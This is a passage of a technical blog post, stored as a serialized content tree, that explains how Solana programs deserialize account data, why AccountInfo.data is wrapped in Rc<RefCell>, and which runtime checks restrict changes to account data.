error",{"type":24,"tag":301,"props":21669,"children":21670},{"style":385},[21671],{"type":30,"value":206},{"type":24,"tag":301,"props":21673,"children":21674},{"style":314},[21675],{"type":30,"value":21676},"into",{"type":24,"tag":301,"props":21678,"children":21679},{"style":359},[21680],{"type":30,"value":10318},{"type":24,"tag":301,"props":21682,"children":21683},{"class":303,"line":447},[21684],{"type":24,"tag":301,"props":21685,"children":21686},{"style":359},[21687],{"type":30,"value":501},{"type":24,"tag":301,"props":21689,"children":21690},{"class":303,"line":476},[21691],{"type":24,"tag":301,"props":21692,"children":21693},{"style":359},[21694],{"type":30,"value":698},{"type":24,"tag":32,"props":21696,"children":21697},{},[21698,21700,21705,21707,21713,21715,21722,21724,21730,21732,21739],{"type":30,"value":21699},"What we see here is the contract's real entrypoint - it takes a ",{"type":24,"tag":145,"props":21701,"children":21703},{"className":21702},[],[21704],{"type":30,"value":10249},{"type":30,"value":21706}," buffer in from the loader, and calls ",{"type":24,"tag":145,"props":21708,"children":21710},{"className":21709},[],[21711],{"type":30,"value":21712},"solana_program::entrypoint::deserialize",{"type":30,"value":21714},", which then ",{"type":24,"tag":188,"props":21716,"children":21719},{"href":21717,"rel":21718},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#281-337",[192],[21720],{"type":30,"value":21721},"parses out",{"type":30,"value":21723}," all the ",{"type":24,"tag":145,"props":21725,"children":21727},{"className":21726},[],[21728],{"type":30,"value":21729},"AccountInfo",{"type":30,"value":21731},"s, instruction data, and the current running program ID. We can see how the data buffer is ",{"type":24,"tag":188,"props":21733,"children":21736},{"href":21734,"rel":21735},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#308-316",[192],[21737],{"type":30,"value":21738},"laid out",{"type":30,"value":1679},{"type":24,"tag":291,"props":21741,"children":21743},{"className":9818,"code":21742,"language":9817,"meta":7,"style":7},"#[allow(clippy::cast_ptr_alignment)]\nlet data_len = *(input.add(offset) as *const u64) as usize;\noffset += size_of::\u003Cu64>();\n\nlet data = Rc::new(RefCell::new({\n from_raw_parts_mut(input.add(offset), data_len)\n}));\noffset += data_len + MAX_PERMITTED_DATA_INCREASE;\noffset += (offset as *const u8).align_offset(BPF_ALIGN_OF_U128); // padding\n",[21744],{"type":24,"tag":145,"props":21745,"children":21746},{"__ignoreMap":7},[21747,21764,21844,21877,21884,21931,21976,21984,22008],{"type":24,"tag":301,"props":21748,"children":21749},{"class":303,"line":304},[21750,21755,21759],{"type":24,"tag":301,"props":21751,"children":21752},{"style":359},[21753],{"type":30,"value":21754},"#[allow(clippy",{"type":24,"tag":301,"props":21756,"children":21757},{"style":385},[21758],{"type":30,"value":10308},{"type":24,"tag":301,"props":21760,"children":21761},{"style":359},[21762],{"type":30,"value":21763},"cast_ptr_alignment)]\n",{"type":24,"tag":301,"props":21765,"children":21766},{"class":303,"line":320},[21767,21771,21776,21780,21784,21788,21792,21796,21800,21804,21808,21812,21816,21820,21824,21828,21832,21836,21840],{"type":24,"tag":301,"props":21768,"children":21769},{"style":348},[21770],{"type":30,"value":3258},{"type":24,"tag":301,"props":21772,"children":21773},{"style":369},[21774],{"type":30,"value":21775}," data_len",{"type":24,"tag":301,"props":21777,"children":21778},{"style":385},[21779],{"type":30,"value":2537},{"type":24,"tag":301,"props":21781,"children":21782},{"style":385},[21783],{"type":30,"value":431},{"type":24,"tag":301,"props":21785,"children":21786},{"style":359},[21787],{"type":30,"value":362},{"type":24,"tag":301,"props":21789,"children":21790},{"style":369},[21791],{"type":30,"value":15181},{"type":24,"tag":301,"props":21793,"children":21794},{"style":385},[21795],{"type":30,"value":206},{"type":24,"tag":301,"props":21797,"children":21798},{"style":314},[21799],{"type":30,"value":16443},{"type":24,"tag":301,"props":21801,"children":21802},{"style":359},[21803],{"type":30,"value":362},{"type":24,"tag":301,"props":21805,"children":21806},{"style":369},[21807],{"type":30,"value":20694},{"type":24,"tag":301,"props":21809,"children":21810},{"style":359},[21811],{"type":30,"value":911},{"type":24,"tag":301,"props":21813,"children":21814},{"style":348},[21815],{"type":30,"value":15654},{"type":24,"tag":301,"props":21817,"children":21818},{"style":385},[21819],{"type":30,"value":431},{"type":24,"tag":301,"props":21821,"children":21822},{"style":348},[21823],{"type":30,"value":16460},{"type":24,"tag":301,"props":21825,"children":21826},{"style":10246},[21827],{"type":30,"value":12680},{"type":24,"tag":301,"props":21829,"children":21830},{"style":359},[21831],{"type":30,"value":911},{"type":24,"tag":301,"props":21833,"children":21834},{"style":348},[21835],{"type":30,"value":15654},{"type":24,"tag":301,"props":21837,"children":21838},{"style":10246},[21839],{"type":30,"value":20525},{"type":24,"tag":301,"props":21841,"children":21842},{"style":359},[21843],{"type":30,"value":492},{"type":24,"tag":301,"props":21845,"children":21846},{"class":303,"line":335},[21847,21851,21856,21861,21865,21869,21873],{"type":24,"tag":301,"props":21848,"children":21849},{"style":369},[21850],{"type":30,"value":20694},{"type":24,"tag":301,"props":21852,"children":21853},{"style":385},[21854],{"type":30,"value":21855}," +=",{"type":24,"tag":301,"props":21857,"children":21858},{"style":314},[21859],{"type":30,"value":21860}," size_of",{"type":24,"tag":301,"props":21862,"children":21863},{"style":385},[21864],{"type":30,"value":10308},{"type":24,"tag":301,"props":21866,"children":21867},{"style":359},[21868],{"type":30,"value":1849},{"type":24,"tag":301,"props":21870,"children":21871},{"style":10246},[21872],{"type":30,"value":14857},{"type":24,"tag":301,"props":21874,"children":21875},{"style":359},[21876],{"type":30,"value":15266},{"type":24,"tag":301,"props":21878,"children":21879},{"class":303,"line":344},[21880],{"type":24,"tag":301,"props":21881,"children":21882},{"emptyLinePlaceholder":16},[21883],{"type":30,"value":341},{"type":24,"tag":301,"props":21885,"children":21886},{"class":303,"line":401},[21887,21891,21896,21900,21905,21909,21914,21919,21923,21927],{"type":24,"tag":301,"props":21888,"children":21889},{"style":348},[21890],{"type":30,"value":3258},{"type":24,"tag":301,"props":21892,"children":21893},{"style":369},[21894],{"type":30,"value":21895}," data",{"type":24,"tag":301,"props":21897,"children":21898},{"style":385},[21899],{"type":30,"value":2537},{"type":24,"tag":301,"props":21901,"children":21902},{"style":10246},[21903],{"type":30,"value":21904}," Rc",{"type":24,"tag":301,"props":21906,"children":21907},{"style":385},[21908],{"type":30,"value":10308},{"type":24,"tag":301,"props":21910,"children":21911},{"style":314},[21912],{"type":30,"value":21913},"new",{"type":24,"tag":301,"props":21915,"children":21916},{"style":359},[21917],{"type":30,"value":21918},"(RefCell",{"type":24,"tag":301,"props":21920,"children":21921},{"style":385},[21922],{"type":30,"value":10308},{"type":24,"tag":301,"props":21924,"children":21925},{"style":314},[21926],{"type":30,"value":21913},{"type":24,"tag":301,"props":21928,"children":21929},{"style":359},[21930],{"type":30,"value":4304},{"type":24,"tag":301,"props":21932,"children":21933},{"class":303,"line":415},[21934,21939,21943,21947,21951,21955,21959,21963,21968,21972],{"type":24,"tag":301,"props":21935,"children":21936},{"style":314},[21937],{"type":30,"value":21938}," from_raw_parts_mut",{"type":24,"tag":301,"props":21940,"children":21941},{"style":359},[21942],{"type":30,"value":362},{"type":24,"tag":301,"props":21944,"children":21945},{"style":369},[21946],{"type":30,"value":15181},{"type":24,"tag":301,"props":21948,"children":21949},{"style":385},[21950],{"type":30,"value":206},{"type":24,"tag":301,"props":21952,"children":21953},{"style":314},[21954],{"type":30,"value":16443},{"type":24,"tag":301,"props":21956,"children":21957},{"style":359},[21958],{"type":30,"value":362},{"type":24,"tag":301,"props":21960,"children":21961},{"style":369},[21962],{"type":30,"value":20694},{"type":24,"tag":301,"props":21964,"children":21965},{"style":359},[21966],{"type":30,"value":21967},"), ",{"type":24,"tag":301,"props":21969,"children":21970},{"style":369},[21971],{"type":30,"value":20599},{"type":24,"tag":301,"props":21973,"children":21974},{"style":359},[21975],{"type":30,"value":791},{"type":24,"tag":301,"props":21977,"children":21978},{"class":303,"line":439},[21979],{"type":24,"tag":301,"props":21980,"children":21981},{"style":359},[21982],{"type":30,"value":21983},"}));\n",{"type":24,"tag":301,"props":21985,"children":21986},{"class":303,"line":447},[21987,21991,21995,21999,22003],{"type":24,"tag":301,"props":21988,"children":21989},{"style":369},[21990],{"type":30,"value":20694},{"type":24,"tag":301,"props":21992,"children":21993},{"style":385},[21994],{"type":30,"value":21855},{"type":24,"tag":301,"props":21996,"children":21997},{"style":369},[21998],{"type":30,"value":21775},{"type":24,"tag":301,"props":22000,"children":22001},{"style":385},[22002],{"type":30,"value":957},{"type":24,"tag":301,"props":22004,"children":22005},{"style":359},[22006],{"type":30,"value":22007}," MAX_PERMITTED_DATA_INCREASE;\n",{"type":24,"tag":301,"props":22009,"children":22010},{"class":303,"line":476},[22011,22015,22019,22023,22027,22031,22035,22039,22043,22047,22051,22056,22061],{"type":24,"tag":301,"props":22012,"children":22013},{"style":369},[22014],{"type":30,"value":20694},{"type":24,"tag":301,"props":22016,"children":22017},{"style":385},[22018],{"type":30,"value":21855},{"type":24,"tag":301,"props":22020,"children":22021},{"style":359},[22022],{"type":30,"value":873},{"type":24,"tag":301,"props":22024,"children":22025},{"style":369},[22026],{"type":30,"value":20694},{"type":24,"tag":301,"props":22028,"children":22029},{"style":348},[22030],{"type":30,"value":15640},{"type":24,"tag":301,"props":22032,"children":22033},{"style":385},[22034],{"type":30,"value":431},{"type":24,"tag":301,"props":22036,"children":22037},{"style":348},[22038],{"type":30,"value":16460},{"type":24,"tag":301,"props":22040,"children":22041},{"style":10246},[22042],{"type":30,"value":21426},{"type":24,"tag":301,"props":22044,"children":22045},{"style":359},[22046],{"type":30,"value":9961},{"type":24,"tag":301,"props":22048,"children":22049},{"style":385},[22050],{"type":30,"value":206},{"type":24,"tag":301,"props":22052,"children":22053},{"style":314},[22054],{"type":30,"value":22055},"align_offset",{"type":24,"tag":301,"props":22057,"children":22058},{"style":359},[22059],{"type":30,"value":22060},"(BPF_ALIGN_OF_U128); ",{"type":24,"tag":301,"props":22062,"children":22063},{"style":1062},[22064],{"type":30,"value":22065},"// padding\n",{"type":24,"tag":32,"props":22067,"children":22068},{},[22069,22071,22076,22078,22084,22086,22097,22099,22104,22106,22112,22114,22120,22121,22127],{"type":30,"value":22070},"In English, we have the length of the data, as a ",{"type":24,"tag":145,"props":22072,"children":22074},{"className":22073},[],[22075],{"type":30,"value":14857},{"type":30,"value":22077},", followed immediately by the data, and an additional ",{"type":24,"tag":145,"props":22079,"children":22081},{"className":22080},[],[22082],{"type":30,"value":22083},"MAX_PERMITTED_DATA_INCREASE",{"type":30,"value":22085}," of reserve space (+ padding) after that. Using the length and data pointer, we construct a Rust slice reference (",{"type":24,"tag":188,"props":22087,"children":22090},{"href":22088,"rel":22089},"https://doc.rust-lang.org/std/slice/fn.from_raw_parts_mut.html",[192],[22091],{"type":24,"tag":145,"props":22092,"children":22094},{"className":22093},[],[22095],{"type":30,"value":22096},"slice::from_raw_parts_mut",{"type":30,"value":22098},") - slices are how Rust represents a, well, ",{"type":24,"tag":5422,"props":22100,"children":22101},{},[22102],{"type":30,"value":22103},"slice",{"type":30,"value":22105}," (contiguous chunk) of memory - then wrap it up inside a ",{"type":24,"tag":145,"props":22107,"children":22109},{"className":22108},[],[22110],{"type":30,"value":22111},"Rc\u003CRefCell\u003CT>>",{"type":30,"value":22113},", giving us the unwieldy-looking type of ",{"type":24,"tag":145,"props":22115,"children":22117},{"className":22116},[],[22118],{"type":30,"value":22119},"AccountInfo.data",{"type":30,"value":5615},{"type":24,"tag":145,"props":22122,"children":22124},{"className":22123},[],[22125],{"type":30,"value":22126},"Rc\u003CRefCell\u003C&mut [u8]>>",{"type":30,"value":206},{"type":24,"tag":32,"props":22129,"children":22130},{},[22131,22133,22140],{"type":30,"value":22132},"Now, what's the point of this complicated type? That's because when the same account is passed in multiple times to a program, instead of duplicating the data for the account, the BPF loader simply refers back to the first instance of the account. On the Rust side, that corresponds to ",{"type":24,"tag":188,"props":22134,"children":22137},{"href":22135,"rel":22136},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#335-336",[192],[22138],{"type":30,"value":22139},"cloning the referenced account",{"type":30,"value":1679},{"type":24,"tag":291,"props":22142,"children":22144},{"className":9818,"code":22143,"language":9817,"meta":7,"style":7},"// Duplicate account, clone the original\naccounts.push(accounts[dup_info as usize].clone());\n",[22145],{"type":24,"tag":145,"props":22146,"children":22147},{"__ignoreMap":7},[22148,22156],{"type":24,"tag":301,"props":22149,"children":22150},{"class":303,"line":304},[22151],{"type":24,"tag":301,"props":22152,"children":22153},{"style":1062},[22154],{"type":30,"value":22155},"// Duplicate account, clone the original\n",{"type":24,"tag":301,"props":22157,"children":22158},{"class":303,"line":320},[22159,22163,22167,22171,22175,22179,22183,22188,22192,22196,22201,22205,22210],{"type":24,"tag":301,"props":22160,"children":22161},{"style":369},[22162],{"type":30,"value":21467},{"type":24,"tag":301,"props":22164,"children":22165},{"style":385},[22166],{"type":30,"value":206},{"type":24,"tag":301,"props":22168,"children":22169},{"style":314},[22170],{"type":30,"value":4299},{"type":24,"tag":301,"props":22172,"children":22173},{"style":359},[22174],{"type":30,"value":362},{"type":24,"tag":301,"props":22176,"children":22177},{"style":369},[22178],{"type":30,"value":21467},{"type":24,"tag":301,"props":22180,"children":22181},{"style":359},[22182],{"type":30,"value":541},{"type":24,"tag":301,"props":22184,"children":22185},{"style":369},[22186],{"type":30,"value":22187},"dup_info",{"type":24,"tag":301,"props":22189,"children":22190},{"style":348},[22191],{"type":30,"value":15640},{"type":24,"tag":301,"props":22193,"children":22194},{"style":10246},[22195],{"type":30,"value":20525},{"type":24,"tag":301,"props":22197,"children":22198},{"style":359},[22199],{"type":30,"value":22200},"]",{"type":24,"tag":301,"props":22202,"children":22203},{"style":385},[22204],{"type":30,"value":206},{"type":24,"tag":301,"props":22206,"children":22207},{"style":314},[22208],{"type":30,"value":22209},"clone",{"type":24,"tag":301,"props":22211,"children":22212},{"style":359},[22213],{"type":30,"value":22214},"());\n",{"type":24,"tag":32,"props":22216,"children":22217},{},[22218,22220,22225,22227,22232,22233,22238,22240,22245,22246,22252,22254,22259,22261,22273,22275,22280],{"type":30,"value":22219},"Since ",{"type":24,"tag":145,"props":22221,"children":22223},{"className":22222},[],[22224],{"type":30,"value":10528},{"type":30,"value":22226}," inside the ",{"type":24,"tag":145,"props":22228,"children":22230},{"className":22229},[],[22231],{"type":30,"value":21729},{"type":30,"value":7035},{"type":24,"tag":145,"props":22234,"children":22236},{"className":22235},[],[22237],{"type":30,"value":22111},{"type":30,"value":22239},", where the ",{"type":24,"tag":145,"props":22241,"children":22243},{"className":22242},[],[22244],{"type":30,"value":12807},{"type":30,"value":7035},{"type":24,"tag":145,"props":22247,"children":22249},{"className":22248},[],[22250],{"type":30,"value":22251},"&mut [u8]",{"type":30,"value":22253}," pointing at the actual data buffer, when we clone the ",{"type":24,"tag":145,"props":22255,"children":22257},{"className":22256},[],[22258],{"type":30,"value":21729},{"type":30,"value":22260},", we get a new reference",{"type":24,"tag":22262,"props":22263,"children":22264},"sup",{},[22265],{"type":24,"tag":188,"props":22266,"children":22271},{"href":22267,"ariaDescribedBy":22268,"dataFootnoteRef":7,"id":22270},"#user-content-fn-rc-refs",[22269],"footnote-label","user-content-fnref-rc-refs",[22272],{"type":30,"value":546},{"type":30,"value":22274}," to the slice pointing at the ",{"type":24,"tag":5422,"props":22276,"children":22277},{},[22278],{"type":30,"value":22279},"same",{"type":30,"value":22281}," data buffer.",{"type":24,"tag":32,"props":22283,"children":22284},{},[22285,22287,22293,22295,22301],{"type":30,"value":22286},"And of course to uphold borrowing rules while having a shared pointer, we have interior mutability via ",{"type":24,"tag":145,"props":22288,"children":22290},{"className":22289},[],[22291],{"type":30,"value":22292},"RefCell",{"type":30,"value":22294}," to check the rules at runtime. (The ",{"type":24,"tag":145,"props":22296,"children":22298},{"className":22297},[],[22299],{"type":30,"value":22300},"lamports",{"type":30,"value":22302}," field is very similar, for essentially the same reason - we need to be able to mutate it, but it is also shared between multiple instances of the same account.)",{"type":24,"tag":32,"props":22304,"children":22305},{},[22306,22308,22314],{"type":30,"value":22307},"Changing the data of an account is done by simply writing to ",{"type":24,"tag":145,"props":22309,"children":22311},{"className":22310},[],[22312],{"type":30,"value":22313},"AccountInfo::data",{"type":30,"value":22315},", which, as we just saw, is basically a pointer into the serialized buffer from the runtime; after the program exits, the loader reads the buffer back in to look at what the new state of the accounts should be.",{"type":24,"tag":32,"props":22317,"children":22318},{},[22319,22321,22328],{"type":30,"value":22320},"This is also where the ",{"type":24,"tag":188,"props":22322,"children":22325},{"href":22323,"rel":22324},"https://github.com/solana-labs/solana/blob/9fb0e76dc276f88b79720112477383a120c61b8f/program-runtime/src/pre_account.rs",[192],[22326],{"type":30,"value":22327},"runtime validity checks",{"type":30,"value":22329}," are imposed.",{"type":24,"tag":291,"props":22331,"children":22333},{"className":9818,"code":22332,"language":9817,"meta":7,"style":7},"// Only the owner may change account data\n// and if the account is writable\n// and if the account is not executable\nif !(program_id == pre.owner()\n && is_writable // line coverage used to get branch coverage\n && !pre.executable())\n && pre.data() != post.data()\n{\n if pre.executable() {\n return Err(InstructionError::ExecutableDataModified);\n } else if is_writable {\n return Err(InstructionError::ExternalAccountDataModified);\n } else {\n return Err(InstructionError::ReadonlyDataModified);\n }\n}\n",[22334],{"type":24,"tag":145,"props":22335,"children":22336},{"__ignoreMap":7},[22337,22345,22353,22361,22403,22421,22450,22494,22501,22524,22558,22583,22615,22630,22662,22669],{"type":24,"tag":301,"props":22338,"children":22339},{"class":303,"line":304},[22340],{"type":24,"tag":301,"props":22341,"children":22342},{"style":1062},[22343],{"type":30,"value":22344},"// Only the owner may change account data\n",{"type":24,"tag":301,"props":22346,"children":22347},{"class":303,"line":320},[22348],{"type":24,"tag":301,"props":22349,"children":22350},{"style":1062},[22351],{"type":30,"value":22352},"// and if the account is writable\n",{"type":24,"tag":301,"props":22354,"children":22355},{"class":303,"line":335},[22356],{"type":24,"tag":301,"props":22357,"children":22358},{"style":1062},[22359],{"type":30,"value":22360},"// and if the account is not executable\n",{"type":24,"tag":301,"props":22362,"children":22363},{"class":303,"line":344},[22364,22369,22373,22377,22381,22385,22390,22394,22399],{"type":24,"tag":301,"props":22365,"children":22366},{"style":308},[22367],{"type":30,"value":22368},"if",{"type":24,"tag":301,"props":22370,"children":22371},{"style":385},[22372],{"type":30,"value":19659},{"type":24,"tag":301,"props":22374,"children":22375},{"style":359},[22376],{"type":30,"value":362},{"type":24,"tag":301,"props":22378,"children":22379},{"style":369},[22380],{"type":30,"value":21458},{"type":24,"tag":301,"props":22382,"children":22383},{"style":385},[22384],{"type":30,"value":2460},{"type":24,"tag":301,"props":22386,"children":22387},{"style":369},[22388],{"type":30,"value":22389}," pre",{"type":24,"tag":301,"props":22391,"children":22392},{"style":385},[22393],{"type":30,"value":206},{"type":24,"tag":301,"props":22395,"children":22396},{"style":314},[22397],{"type":30,"value":22398},"owner",{"type":24,"tag":301,"props":22400,"children":22401},{"style":359},[22402],{"type":30,"value":14551},{"type":24,"tag":301,"props":22404,"children":22405},{"class":303,"line":401},[22406,22411,22416],{"type":24,"tag":301,"props":22407,"children":22408},{"style":385},[22409],{"type":30,"value":22410}," &&",{"type":24,"tag":301,"props":22412,"children":22413},{"style":369},[22414],{"type":30,"value":22415}," is_writable",{"type":24,"tag":301,"props":22417,"children":22418},{"style":1062},[22419],{"type":30,"value":22420}," // line coverage used to get branch coverage\n",{"type":24,"tag":301,"props":22422,"children":22423},{"class":303,"line":415},[22424,22428,22432,22436,22440,22445],{"type":24,"tag":301,"props":22425,"children":22426},{"style":385},[22427],{"type":30,"value":22410},{"type":24,"tag":301,"props":22429,"children":22430},{"style":385},[22431],{"type":30,"value":19659},{"type":24,"tag":301,"props":22433,"children":22434},{"style":369},[22435],{"type":30,"value":291},{"type":24,"tag":301,"props":22437,"children":22438},{"style":385},[22439],{"type":30,"value":206},{"type":24,"tag":301,"props":22441,"children":22442},{"style":314},[22443],{"type":30,"value":22444},"executable",{"type":24,"tag":301,"props":22446,"children":22447},{"style":359},[22448],{"type":30,"value":22449},"())\n",{"type":24,"tag":301,"props":22451,"children":22452},{"class":303,"line":439},[22453,22457,22461,22465,22469,22473,22477,22482,22486,22490],{"type":24,"tag":301,"props":22454,"children":22455},{"style":385},[22456],{"type":30,"value":22410},{"type":24,"tag":301,"props":22458,"children":22459},{"style":369},[22460],{"type":30,"value":22389},{"type":24,"tag":301,"props":22462,"children":22463},{"style":385},[22464],{"type":30,"value":206},{"type":24,"tag":301,"props":22466,"children":22467},{"style":314},[22468],{"type":30,"value":10528},{"type":24,"tag":301,"props":22470,"children":22471},{"style":359},[22472],{"type":30,"value":20835},{"type":24,"tag":301,"props":22474,"children":22475},{"style":385},[22476],{"type":30,"value":463},{"type":24,"tag":301,"props":22478,"children":22479},{"style":369},[22480],{"type":30,"value":22481}," post",{"type":24,"tag":301,"props":22483,"children":22484},{"style":385},[22485],{"type":30,"value":206},{"type":24,"tag":301,"props":22487,"children":22488},{"style":314},[22489],{"type":30,"value":10528},{"type":24,"tag":301,"props":22491,"children":22492},{"style":359},[22493],{"type":30,"value":14551},{"type":24,"tag":301,"props":22495,"children":22496},{"class":303,"line":447},[22497],{"type":24,"tag":301,"props":22498,"children":22499},{"style":359},[22500],{"type":30,"value":799},{"type":24,"tag":301,"props":22502,"children":22503},{"class":303,"line":476},[22504,22508,22512,22516,22520],{"type":24,"tag":301,"props":22505,"children":22506},{"style":308},[22507],{"type":30,"value":453},{"type":24,"tag":301,"props":22509,"children":22510},{"style":369},[22511],{"type":30,"value":22389},{"type":24,"tag":301,"props":22513,"children":22514},{"style":385},[22515],{"type":30,"value":206},{"type":24,"tag":301,"props":22517,"children":22518},{"style":314},[22519],{"type":30,"value":22444},{"type":24,"tag":301,"props":22521,"children":22522},{"style":359},[22523],{"type":30,"value":3883},{"type":24,"tag":301,"props":22525,"children":22526},{"class":303,"line":495},[22527,22531,22536,22540,22545,22549,22554],{"type":24,"tag":301,"props":22528,"children":22529},{"style":308},[22530],{"type":30,"value":482},{"type":24,"tag":301,"props":22532,"children":22533},{"style":10246},[22534],{"type":30,"value":22535}," Err",{"type":24,"tag":301,"props":22537,"children":22538},{"style":359},[22539],{"type":30,"value":362},{"type":24,"tag":301,"props":22541,"children":22542},{"style":10246},[22543],{"type":30,"value":22544},"InstructionError",{"type":24,"tag":301,"props":22546,"children":22547},{"style":385},[22548],{"type":30,"value":10308},{"type":24,"tag":301,"props":22550,"children":22551},{"style":10246},[22552],{"type":30,"value":22553},"ExecutableDataModified",{"type":24,"tag":301,"props":22555,"children":22556},{"style":359},[22557],{"type":30,"value":589},{"type":24,"tag":301,"props":22559,"children":22560},{"class":303,"line":504},[22561,22566,22570,22575,22579],{"type":24,"tag":301,"props":22562,"children":22563},{"style":359},[22564],{"type":30,"value":22565}," } ",{"type":24,"tag":301,"props":22567,"children":22568},{"style":308},[22569],{"type":30,"value":10144},{"type":24,"tag":301,"props":22571,"children":22572},{"style":308},[22573],{"type":30,"value":22574}," if",{"type":24,"tag":301,"props":22576,"children":22577},{"style":369},[22578],{"type":30,"value":22415},{"type":24,"tag":301,"props":22580,"children":22581},{"style":359},[22582],{"type":30,"value":3035},{"type":24,"tag":301,"props":22584,"children":22585},{"class":303,"line":512},[22586,22590,22594,22598,22602,22606,22611],{"type":24,"tag":301,"props":22587,"children":22588},{"style":308},[22589],{"type":30,"value":482},{"type":24,"tag":301,"props":22591,"children":22592},{"style":10246},[22593],{"type":30,"value":22535},{"type":24,"tag":301,"props":22595,"children":22596},{"style":359},[22597],{"type":30,"value":362},{"type":24,"tag":301,"props":22599,"children":22600},{"style":10246},[22601],{"type":30,"value":22544},{"type":24,"tag":301,"props":22603,"children":22604},{"style":385},[22605],{"type":30,"value":10308},{"type":24,"tag":301,"props":22607,"children":22608},{"style":10246},[22609],{"type":30,"value":22610},"ExternalAccountDataModified",{"type":24,"tag":301,"props":22612,"children":22613},{"style":359},[22614],{"type":30,"value":589},{"type":24,"tag":301,"props":22616,"children":22617},{"class":303,"line":592},[22618,22622,22626],{"type":24,"tag":301,"props":22619,"children":22620},{"style":359},[22621],{"type":30,"value":22565},{"type":24,"tag":301,"props":22623,"children":22624},{"style":308},[22625],{"type":30,"value":10144},{"type":24,"tag":301,"props":22627,"children":22628},{"style":359},[22629],{"type":30,"value":3035},{"type":24,"tag":301,"props":22631,"children":22632},{"class":303,"line":619},[22633,22637,22641,22645,22649,22653,22658],{"type":24,"tag":301,"props":22634,"children":22635},{"style":308},[22636],{"type":30,"value":482},{"type":24,"tag":301,"props":22638,"children":22639},{"style":10246},[22640],{"type":30,"value":22535},{"type":24,"tag":301,"props":22642,"children":22643},{"style":359},[22644],{"type":30,"value":362},{"type":24,"tag":301,"props":22646,"children":22647},{"style":10246},[22648],{"type":30,"value":22544},{"type":24,"tag":301,"props":22650,"children":22651},{"style":385},[22652],{"type":30,"value":10308},{"type":24,"tag":301,"props":22654,"children":22655},{"style":10246},[22656],{"type":30,"value":22657},"ReadonlyDataModified",{"type":24,"tag":301,"props":22659,"children":22660},{"style":359},[22661],{"type":30,"value":589},{"type":24,"tag":301,"props":22663,"children":22664},{"class":303,"line":635},[22665],{"type":24,"tag":301,"props":22666,"children":22667},{"style":359},[22668],{"type":30,"value":501},{"type":24,"tag":301,"props":22670,"children":22671},{"class":303,"line":643},[22672],{"type":24,"tag":301,"props":22673,"children":22674},{"style":359},[22675],{"type":30,"value":698},{"type":24,"tag":80,"props":22677,"children":22679},{"id":22678},"back-to-realloc",[22680,22682],{"type":30,"value":22681},"Back to ",{"type":24,"tag":145,"props":22683,"children":22685},{"className":22684},[],[22686],{"type":30,"value":20432},{"type":24,"tag":32,"props":22688,"children":22689},{},[22690],{"type":30,"value":22691},"As a reminder, this is what we were looking at before that detour:",{"type":24,"tag":291,"props":22693,"children":22694},{"className":9818,"code":21183,"language":9817,"meta":7,"style":7},[22695],{"type":24,"tag":145,"props":22696,"children":22697},{"__ignoreMap":7},[22698,22705,22792],{"type":24,"tag":301,"props":22699,"children":22700},{"class":303,"line":304},[22701],{"type":24,"tag":301,"props":22702,"children":22703},{"style":1062},[22704],{"type":30,"value":21195},{"type":24,"tag":301,"props":22706,"children":22707},{"class":303,"line":320},[22708,22712,22716,22720,22724,22728,22732,22736,22740,22744,22748,22752,22756,22760,22764,22768,22772,22776,22780,22784,22788],{"type":24,"tag":301,"props":22709,"children":22710},{"style":348},[22711],{"type":30,"value":3258},{"type":24,"tag":301,"props":22713,"children":22714},{"style":369},[22715],{"type":30,"value":20650},{"type":24,"tag":301,"props":22717,"children":22718},{"style":385},[22719],{"type":30,"value":2537},{"type":24,"tag":301,"props":22721,"children":22722},{"style":348},[22723],{"type":30,"value":20590},{"type":24,"tag":301,"props":22725,"children":22726},{"style":385},[22727],{"type":30,"value":206},{"type":24,"tag":301,"props":22729,"children":22730},{"style":314},[22731],{"type":30,"value":20667},{"type":24,"tag":301,"props":22733,"children":22734},{"style":359},[22735],{"type":30,"value":20672},{"type":24,"tag":301,"props":22737,"children":22738},{"style":385},[22739],{"type":30,"value":9966},{"type":24,"tag":301,"props":22741,"children":22742},{"style":314},[22743],{"type":30,"value":20681},{"type":24,"tag":301,"props":22745,"children":22746},{"style":359},[22747],{"type":30,"value":20672},{"type":24,"tag":301,"props":22749,"children":22750},{"style":385},[22751],{"type":30,"value":206},{"type":24,"tag":301,"props":22753,"children":22754},{"style":314},[22755],{"type":30,"value":20694},{"type":24,"tag":301,"props":22757,"children":22758},{"style":359},[22759],{"type":30,"value":362},{"type":24,"tag":301,"props":22761,"children":22762},{"style":385},[22763],{"type":30,"value":9253},{"type":24,"tag":301,"props":22765,"children":22766},{"style":466},[22767],{"type":30,"value":10900},{"type":24,"tag":301,"props":22769,"children":22770},{"style":359},[22771],{"type":30,"value":911},{"type":24,"tag":301,"props":22773,"children":22774},{"style":348},[22775],{"type":30,"value":15654},{"type":24,"tag":301,"props":22777,"children":22778},{"style":385},[22779],{"type":30,"value":431},{"type":24,"tag":301,"props":22781,"children":22782},{"style":348},[22783],{"type":30,"value":10550},{"type":24,"tag":301,"props":22785,"children":22786},{"style":10246},[22787],{"type":30,"value":12680},{"type":24,"tag":301,"props":22789,"children":22790},{"style":359},[22791],{"type":30,"value":492},{"type":24,"tag":301,"props":22793,"children":22794},{"class":303,"line":335},[22795,22799,22803,22807,22811,22815,22819],{"type":24,"tag":301,"props":22796,"children":22797},{"style":385},[22798],{"type":30,"value":772},{"type":24,"tag":301,"props":22800,"children":22801},{"style":369},[22802],{"type":30,"value":3137},{"type":24,"tag":301,"props":22804,"children":22805},{"style":385},[22806],{"type":30,"value":2537},{"type":24,"tag":301,"props":22808,"children":22809},{"style":369},[22810],{"type":30,"value":20750},{"type":24,"tag":301,"props":22812,"children":22813},{"style":348},[22814],{"type":30,"value":15640},{"type":24,"tag":301,"props":22816,"children":22817},{"style":10246},[22818],{"type":30,"value":12680},{"type":24,"tag":301,"props":22820,"children":22821},{"style":359},[22822],{"type":30,"value":492},{"type":24,"tag":32,"props":22824,"children":22825},{},[22826,22831,22833,22838,22840,22845,22847,22858,22860,22865,22867,22872],{"type":24,"tag":145,"props":22827,"children":22829},{"className":22828},[],[22830],{"type":30,"value":20667},{"type":30,"value":22832}," gives us the ",{"type":24,"tag":145,"props":22834,"children":22836},{"className":22835},[],[22837],{"type":30,"value":22251},{"type":30,"value":22839}," from the ",{"type":24,"tag":145,"props":22841,"children":22843},{"className":22842},[],[22844],{"type":30,"value":22126},{"type":30,"value":22846},", whose data is inside the serialized buffer and immediately after the size of the data inside the serialized buffer. And 